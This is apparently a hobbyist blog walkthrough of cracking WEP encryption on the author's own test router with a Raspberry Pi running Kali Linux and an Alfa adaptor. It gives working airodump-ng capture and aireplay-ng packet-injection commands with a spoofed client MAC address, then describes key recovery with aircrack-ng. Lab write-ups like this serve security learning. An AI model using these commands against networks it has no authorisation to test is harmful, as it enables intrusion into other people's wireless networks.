I’ve setup a test router here running WEP encryption as I just got the new Alfa Networks wireless adaptor.
I’ve always had an interest in wireless security. It is pretty interesting to me. These days the dated WEP encryption is pretty weak and can be cracked fairly easily. Here i will show how it can be achieved.
For this test i am using my Raspberry Pi Zero W running Kali Linux. It is a perfect little device for wireless hacking once teamed up with the Alfa Networks wireless device.
Once booted into Kali I SSH’d into the machine as i run it headless and checked to see if the device was being picked up, which it was.
Once i did this i used Airmon-ng to put the device into wireless monitor mode. This is a special mode in which it can view wireless traffic and also inject packets. Only special wireless devices can do this (such as the Alfa Networks device I am using.)
For this test I have setup an access point running WEP as “TALKTALK” and then a random bunch of number. It is the 2nd from the top in the list below.
Once i noted down the MAC address I went ahead and used the following command to associate myself with the access point and also create a text file for Aircrack-ng to use to store all the data we capture.
airodump-ng –bssid C4:07:2F:13:A3:E8 -c 7 -w WEPcrack wlan1mon
This gives the following output:
We are now associated with the access point and ready to inject our evilness… But first, we need a client to connect so we can spoof their MAC address so the access point will receive data from us.
I added a device and spoofed the MAC on my machine and ran the following command to commence the packet injection attack from what would appear to be the client MAC address.
aireplay-ng -3 -b C4:07:2F:13:A3:E8 -h 98:4B:E1:CA:4A:12 wlan1mon
The attack is now running! It’s just a short waiting game now as we spoof packets and capture data. Once complete I ran the following command.
this runs Aircrack-ng and tells it to view the text file we made. If we have enough IVs, aircrack-ng will display the key on our screen, usually in hexadecimal format. Simply take that hex key and apply it when logging into the remote AP and you are in!
We have a winner!